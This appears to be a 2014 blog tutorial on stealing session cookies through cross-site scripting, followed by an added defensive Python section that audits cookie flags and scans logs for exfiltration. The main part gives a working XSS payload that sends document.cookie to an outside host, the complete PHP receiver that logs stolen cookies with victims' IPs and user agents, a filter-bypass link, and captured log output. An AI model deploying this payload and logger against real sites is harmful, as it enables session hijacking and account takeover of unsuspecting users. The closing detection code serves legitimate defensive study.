Stealing cookie with Cross-site Scripting (XSS)

8/05/2014

Many web applications and services keep the authentication token in a cookie or session that is assigned after user authentication.

By exploiting a Cross-Site Scripting (XSS) vulnerability, an attacker can execute JavaScript in the target's browser; this is commonly used to steal the user's session token or to redirect the user to a web page containing malicious code.

XSS vulnerabilities in web applications/services are usually confirmed by checking whether a simple script like the one below executes.
<script>alert("test")</script>

Script filters can be bypassed in various ways :) (Bypass XSS Filter http://pastebin.com/mQDbu7Sm )

To steal the target's session token, script code like the following can be written that redirects to the attacker's web page.
<script>document.location="http://www.repo.kr/stealcookie/loggingCookie.php?cookie=" + document.cookie;</script>

loggingCookie.php receives the cookie as a parameter and writes the cookie, together with the IP, port, user agent and other request data, to a file. The code of loggingCookie.php is shown below.
<?php

// Best-effort client address: proxy headers first, then REMOTE_ADDR.
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

// Appends one entry per request (the query string, i.e. the cookie, plus request metadata) to log.txt.
function logData()
{
    $ipLog = "log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_globals');   // was misspelled 'register_gobals'
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    // These $_SERVER keys are not always present; fall back to '' instead of raising notices.
    $rem_port = isset($_SERVER['REMOTE_PORT']) ? $_SERVER['REMOTE_PORT'] : '';
    $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $rqst_method = isset($_SERVER['REQUEST_METHOD']) ? $_SERVER['REQUEST_METHOD'] : '';   // was $_SERVER['METHOD'], which does not exist
    $rem_host = isset($_SERVER['REMOTE_HOST']) ? $_SERVER['REMOTE_HOST'] : '';   // only set when the server does reverse lookups
    $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
    // 'o' is a date() format character (ISO year), so "of" has to be escaped as "\of".
    $date = date('l dS \of F Y h:i:s A');
    $log = fopen($ipLog, "a+");
    if ($log === false) return;

    // Use <br> line breaks if the log file is itself an .htm/.html page, plain newlines otherwise.
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}

logData();

?>

The data written to the file looks like this.

IP: 192.168.0.1 | PORT: 52352 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Tuesday 19th 2014f August 2014 11:54:44 PM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 192.168.0.1 | PORT: 54495 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:07:19 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 39.7.56.20 | PORT: 22813 | HOST:  |  Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:08:27 AM | COOKIE: a918279823420938f09283a09720dd09dc0a0901912

IP: 192.168.0.1 | PORT: 59350 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:38:11 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 192.168.0.1 | PORT: 60023 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:41:23 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 192.168.0.1 | PORT: 60023 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:41:23 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 192.168.0.1 | PORT: 60023 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:41:24 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675   

IP: 192.168.0.1 | PORT: 60025 | HOST:  |  Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4 | METHOD:  | REF:  |  DATE: Wednesday 20th 2014f August 2014 12:41:24 AM | COOKIE: d62493759118381809d2a30a929fc8bcf1462386675
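Two defender-side checks for the scenario above, added here as example code (not part of the original post): a Set-Cookie audit that reports session cookies missing HttpOnly (the attribute that keeps a cookie out of document.cookie), Secure and SameSite, and a heuristic scan of Apache-style log lines for query strings carrying a cookie-looking value, which is the trace the redirect above leaves wherever the request gets logged (an egress proxy or the receiving server). The cookie-name hints, the 8-character value threshold and the sample log lines are assumptions.

```python
import re
from urllib.parse import unquote
# Assumption: cookie names containing these fragments carry a session/auth token.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token")

def audit_set_cookie(header_value):
    """Return the protections missing from one Set-Cookie header value.
    HttpOnly keeps the cookie out of document.cookie, so a stealer like the
    one above gets nothing; Secure and SameSite are reported as well.
    Cookies whose name does not look like a session cookie return []."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip().lower()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    if not any(hint in name for hint in SESSION_NAME_HINTS):
        return []
    return [flag for flag in ("HttpOnly", "Secure", "SameSite")
            if flag.lower() not in attrs]

# A name=value pair whose value is 8+ chars: the shape document.cookie produces (heuristic).
COOKIE_PAIR = re.compile(r"[A-Za-z0-9_\-]+=[^;&\s]{8,}")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+)')

def find_cookie_exfil(log_lines):
    """Flag Apache-style log lines whose query string carries a cookie-looking
    value, i.e. the request the redirect above makes. Returns a list of
    (line_number, parameter_name, decoded_value) tuples."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        m = REQUEST_LINE.search(line)
        if not m or "?" not in m.group(1):
            continue
        query = m.group(1).split("?", 1)[1]
        for pair in query.split("&"):  # split on '&' only; ';' may belong to the cookie string
            param, _, raw = pair.partition("=")
            value = unquote(raw)
            if COOKIE_PAIR.search(value):
                hits.append((lineno, param, value))
    return hits

# Constructed log lines (not taken from the original post) for a quick run.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Aug/2014:00:07:19 +0900] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.7 - - [20/Aug/2014:00:08:27 +0900] "GET /loggingCookie.php?cookie=PHPSESSID=deadbeef0123456789abcdef;%20lang=ko HTTP/1.1" 200 0',
    '10.0.0.9 - - [20/Aug/2014:00:38:11 +0900] "GET /search.php?q=abc=def HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(audit_set_cookie("PHPSESSID=abc123; Path=/"))  # -> ['HttpOnly', 'Secure', 'SameSite']
    print(find_cookie_exfil(SAMPLE_LOG))  # -> [(2, 'cookie', 'PHPSESSID=deadbeef0123456789abcdef; lang=ko')]
```

The third sample line shows the false-positive guard: a short `a=b` fragment inside a parameter value is not reported.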

